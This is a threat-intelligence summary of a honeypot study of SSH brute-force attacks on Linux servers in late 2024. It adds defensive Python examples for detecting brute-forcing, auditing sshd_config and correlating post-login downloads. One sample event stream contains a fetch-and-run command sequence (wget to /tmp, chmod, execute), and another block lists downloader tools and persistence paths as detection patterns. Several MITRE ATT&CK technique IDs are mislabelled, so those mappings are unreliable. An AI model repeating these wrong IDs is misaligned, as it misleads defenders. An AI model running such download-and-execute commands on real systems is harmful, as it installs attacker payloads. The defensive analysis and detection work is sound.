Overview
AhnLab Security Intelligence Center (ASEC) uses a honeypot to respond to and classify brute-force attacks and pre-attacks targeting Linux SSH servers that are being inappropriately managed. This article covers the status of the attack sources identified in the logs from the fourth quarter of 2024 and provides statistics on the attacks launched from these […]
Analysis Summary
This article focuses on analyzing brute-force and pre-attack activities targeting poorly managed Linux SSH servers during the fourth quarter of 2024, using logs collected from a honeypot set up by AhnLab Security Intelligence Center (ASEC). The analysis specifically excludes data related to the P2PInfect worm to provide a clearer view of the other prevalent attack vectors.
# Tool/Technique: P2PInfect Worm (Mentioned as an excluded factor)
## Overview
A malware family observed in brute-force attacks against Linux SSH servers, the P2PInfect worm was a significant component of the observed attack traffic in Q4 2024, accounting for nearly half of all attacks logged before its exclusion from the detailed statistics. Its name suggests peer-to-peer capabilities, most likely used for propagation.
## Technical Details
- Type: Malware family (Worm)
- Platform: Linux (Inferred from target systems)
- Capabilities: Used in brute-force attacks, capable of self-propagation (as a worm).
- First Seen: Not specified
## MITRE ATT&CK Mapping
*Since specific TTPs associated only with P2PInfect are not detailed beyond its attack context, the mapping below is inferred from the general activities described.*
- [TA0001 - Initial Access]
- [T1110 - Brute Force]
- [T1078.004 - Valid Accounts: SSH] (Inferred credential compromise)
## Functionality
### Core Capabilities
- Execution of brute-force attempts against Linux SSH servers.
- Significant volume contributor to observed attacks (49.3% of total).
### Advanced Features
- As a worm, it likely propagates across compromised or vulnerable systems.
## Indicators of Compromise
- File Hashes: Not provided in the text.
- File Names: Not provided in the text.
- Registry Keys: Not applicable (Linux target).
- Network Indicators: Not provided in the text.
- Behavioral Indicators: Attempting unauthorized login via SSH.
## Associated Threat Actors
- Not explicitly named in the text.
## Detection Methods
- Detection would rely on identifying high volumes of abnormal SSH login attempts (brute-force activity).
## Mitigation Strategies
- Enforcing strong, unique passwords for SSH access.
- Implementing SSH key-based authentication instead of passwords.
- Limiting login attempts (rate limiting).
- Restricting SSH access via firewall rules.
## Related Tools/Techniques
- Other brute-force tools or scripts used against SSH.
---
# Tool/Technique: SSH Brute-Force/Credential Stuffing (General Attack Technique)
## Overview
The primary observed activity against poorly managed Linux SSH servers involves automated attempts to gain unauthorized access using brute-force methods or credential stuffing against poorly secured accounts. This activity precedes any payload delivery or deeper compromise.
## Technical Details
- Type: Technique (Attack Pattern)
- Platform: Linux (SSH service)
- Capabilities: Automated attempts to guess or test username/password combinations for SSH access.
- First Seen: Ongoing activity, Q4 2024 focus.
## MITRE ATT&CK Mapping
- [TA0001 - Initial Access]
- [T1110 - Brute Force]
- [T1110.004 - Brute Force: Password Guessing] (If dictionary/manual, though context implies automated)
- [T1110.003 - Brute Force: Credential Stuffing] (Implied by common attack patterns)
- [TA0008 - Lateral Movement] (If successful logins are used to move between systems)
## Functionality
### Core Capabilities
- Scanning the environment for active SSH ports.
- Executing automated login attempts using known or common credentials (dictionary attacks) or credential dumps (stuffing).
### Advanced Features
- Attacks typically stop once a login succeeds or credentials are acquired; only successful logins proceed to the information gathering or malware installation stages.
## Indicators of Compromise
- File Hashes: N/A (Activity focus)
- File Names: N/A (Activity focus)
- Registry Keys: N/A (Linux target)
- Network Indicators: High volume of connection attempts to port 22 (SSH) from a limited set of source IPs.
- Behavioral Indicators: Repetitive failed login events recorded in SSH logs (`auth.log` or similar).
## Associated Threat Actors
- Various automated actors/bots utilizing compromised infrastructure.
## Detection Methods
- **Signature-based detection:** Not applicable, as this is behavioral.
- **Behavioral detection:** Monitoring authentication logs for rapid sequences of failed login attempts originating from the same source IP(s), and monitoring how often rate limits are triggered.
- **YARA rules:** Not applicable.
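The behavioral detection described above, as an added example that is not part of the report: a sliding-window detector over sshd `auth.log` lines that flags a source IP after a burst of failures and escalates the verdict if the same IP then authenticates successfully (the credential-compromise case). The log lines, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Constructed sample auth.log lines (not honeypot data from the report);
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
Dec 12 03:14:01 srv sshd[2101]: Failed password for root from 203.0.113.5 port 40101 ssh2
Dec 12 03:14:02 srv sshd[2102]: Failed password for invalid user admin from 203.0.113.5 port 40102 ssh2
Dec 12 03:14:02 srv sshd[2103]: Failed password for invalid user ubuntu from 203.0.113.5 port 40103 ssh2
Dec 12 03:14:03 srv sshd[2104]: Failed password for root from 203.0.113.5 port 40104 ssh2
Dec 12 03:14:04 srv sshd[2105]: Failed password for root from 203.0.113.5 port 40105 ssh2
Dec 12 03:14:06 srv sshd[2106]: Accepted password for root from 203.0.113.5 port 40106 ssh2
Dec 12 03:20:00 srv sshd[2110]: Failed password for alice from 198.51.100.9 port 50010 ssh2
Dec 12 03:20:30 srv sshd[2111]: Accepted publickey for alice from 198.51.100.9 port 50011 ssh2
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse(lines, year=2024):
    """Yield (timestamp, result, user, ip) for sshd auth lines; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect(lines, threshold=5, window_s=60):
    """Return {ip: verdict}. 'brute-force' once `threshold` failures fall inside a
    `window_s`-second sliding window; 'brute-force+success' if that IP then logs in,
    which is the credential-compromise case that precedes malware installation."""
    failures = defaultdict(deque)   # ip -> timestamps of failures still in the window
    verdicts = {}
    for ts, result, _user, ip in parse(lines):
        q = failures[ip]
        if result == "Failed":
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                verdicts.setdefault(ip, "brute-force")
        elif verdicts.get(ip) == "brute-force":
            verdicts[ip] = "brute-force+success"
    return verdicts
if __name__ == "__main__":
    for ip, verdict in detect(SAMPLE_LOG.splitlines()).items():
        print(ip, verdict)
```

The single failure from 198.51.100.9 followed by a key-based login stays below the threshold and produces no verdict, which keeps ordinary typo-then-retry logins out of the alert stream.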
## Mitigation Strategies
- **Account Lockout Policies:** Implement policies that temporarily lock accounts after a few failed login attempts.
- **Use Strong Passwords:** Mandate complex passwords.
- **2FA/MFA:** Implement Multi-Factor Authentication for SSH if possible.
- **Use SSH Keys:** Disable password-based login entirely and rely solely on SSH key pairs.
- **Fail2Ban/DenyHosts:** Utilize intrusion prevention software configured to automatically block IPs exhibiting brute-force behavior.
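The "use strong passwords / use SSH keys" and lockout recommendations above translate into a handful of `sshd_config` directives. As an added example (not code from the report), this checker reads a config, applies OpenSSH's documented defaults for absent directives and its first-value-wins rule, and lists the settings that still leave password guessing viable; the weak and hardened configurations are constructed.

```python
import re
# OpenSSH defaults that apply when a directive is absent (PermitRootLogin has
# defaulted to prohibit-password since OpenSSH 7.0). sshd uses the FIRST value
# it sees for a directive, so a hardened line placed after a weak one is ignored.
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
}

def parse_sshd_config(text):
    """Return {directive: first value}. Parsing stops at the first Match block,
    whose directives are conditional and need evaluating per matching client."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        settings.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return settings

def audit(text):
    """List the settings that leave SSH password guessing viable."""
    s = {**DEFAULTS, **parse_sshd_config(text)}
    findings = []
    if s["passwordauthentication"].lower() == "yes":
        findings.append("PasswordAuthentication yes: set to no and rely on keys")
    if s["permitrootlogin"].lower() == "yes":
        findings.append("PermitRootLogin yes: root is the most guessed account; set no")
    if int(s["maxauthtries"]) > 3:
        findings.append(f"MaxAuthTries {s['maxauthtries']}: lower to 3 to cut guesses per connection")
    return findings
# Constructed configurations, not taken from the report.
WEAK_CONFIG = """
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
"""
HARDENED_CONFIG = """
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
"""
```

Note that an empty file is not "safe": with stock defaults the checker still reports password authentication enabled and six tries per connection.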
## Related Tools/Techniques
- Dictionary Attacks
- Credential Stuffing
---
# Tool/Technique: Malware Installation (Post-Brute Force Stage)
## Overview
The analysis notes that statistics are focused on cases where the attack proceeded beyond initial scanning and brute-forcing, specifically logs showing the *installation of malware* onto the compromised Linux system. This represents the successful exploitation phase following credential compromise.
## Technical Details
- Type: Technique (Execution/Persistence leading to tool/malware deployment)
- Platform: Linux
- Capabilities: System persistence, downloading and executing secondary payloads, establishing C2 communications.
- First Seen: Ongoing activity, Q4 2024 focus.
## MITRE ATT&CK Mapping
- [TA0002 - Execution]
- [T1059.004 - Command and Scripting Interpreter: Unix Shell] (For deployment commands)
- [TA0003 - Persistence]
- [T1543.002 - Create or Modify System Process: Systemd Service] (Common Linux persistence mechanism)
- [TA0011 - Command and Control] (Inferred subsequent step)
## Functionality
### Core Capabilities
- Executing shell commands to download malware binaries.
- Bypassing execution restrictions (if any).
- Establishing a foothold on the victim machine.
### Advanced Features
- Depending on the specific malware installed (e.g., P2PInfect), advanced capabilities might include rapid, decentralized spreading or data exfiltration.
## Indicators of Compromise
- File Hashes: Specific hashes of installed malware would be present in the full report attachment.
- File Names: Varies greatly based on the specific malware.
- Registry Keys: N/A (Linux target)
- Network Indicators: Outbound connections initiated by a newly spawned process, often to download additional stages or connect to C2.
- Behavioral Indicators: Unusual process execution, execution of `wget`, `curl`, or shell scripts following a successful SSH login event.
## Associated Threat Actors
- Threat Actors leveraging compromised systems for distributed attacks.
## Detection Methods
- **Behavioral detection:** Monitoring for spawned processes that download files or attempt to modify boot/service files following a successful authentication event.
- **Signature-based detection:** Analyzing network traffic for connections or DNS resolutions to known C2 infrastructure associated with the deployed Linux malware.
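The post-authentication behavioral detection above, as an added example that is not part of the report: it correlates a constructed stream of SSH login and process-execution events (the shape an auditd execve rule or an EDR would emit is assumed) and alerts when the same user runs a download tool, executes from a world-writable directory, or touches boot/service files within a short window after logging in.

```python
from datetime import datetime, timedelta

# Constructed event stream (not honeypot data from the report): sshd logins plus
# process-execution records of the kind an auditd execve rule or an EDR emits.
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
EVENTS = [
    {"ts": "2024-12-12T03:14:06", "type": "login", "user": "root", "ip": "203.0.113.5"},
    {"ts": "2024-12-12T03:14:09", "type": "exec", "user": "root", "cmd": "wget http://198.51.100.77/x86 -O /tmp/x86"},
    {"ts": "2024-12-12T03:14:12", "type": "exec", "user": "root", "cmd": "chmod +x /tmp/x86"},
    {"ts": "2024-12-12T03:14:15", "type": "exec", "user": "root", "cmd": "/tmp/x86"},
    {"ts": "2024-12-12T09:00:00", "type": "login", "user": "alice", "ip": "198.51.100.9"},
    {"ts": "2024-12-12T09:00:30", "type": "exec", "user": "alice", "cmd": "git pull"},
    # a scheduled job with no preceding interactive login: not attributed to an SSH session
    {"ts": "2024-12-12T11:00:00", "type": "exec", "user": "backup", "cmd": "curl https://example.com/api"},
]
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
TMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
PERSISTENCE_PATHS = ("/etc/systemd/system", "/etc/cron", "/var/spool/cron", "/etc/rc.local")

def classify(cmd):
    """Reason the command is suspicious post-login, or None."""
    argv0 = cmd.split()[0]
    if argv0.rsplit("/", 1)[-1] in DOWNLOADERS:
        return "download tool"
    if argv0.startswith(TMP_DIRS):
        return "execution from world-writable directory"
    if any(p in cmd for p in PERSISTENCE_PATHS):
        return "boot/service file modification"
    return None

def correlate(events, window=timedelta(minutes=10)):
    """Return (user, source_ip, reason, cmd) for suspicious exec events that follow
    an SSH login by the same user within `window`."""
    last_login = {}
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if e["type"] == "login":
            last_login[e["user"]] = (ts, e["ip"])
            continue
        reason = classify(e["cmd"])
        login = last_login.get(e["user"])
        if reason and login and ts - login[0] <= window:
            alerts.append((e["user"], login[1], reason, e["cmd"]))
    return alerts
```

Tying the alert to the login's source IP gives the responder the same pivot the honeypot statistics use: the attack source, not just the local account.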
## Mitigation Strategies
- **Principle of Least Privilege:** Ensure the compromised account (even if default/weak) has minimal permissions to prevent widespread system modification.
- **System Hardening:** Disable unnecessary services and restrict network egress where possible.
- **Regular Auditing:** Routinely check system services and cron jobs for unauthorized additions.
## Related Tools/Techniques
- Post-exploitation frameworks.
- Various Linux backdoors and miners.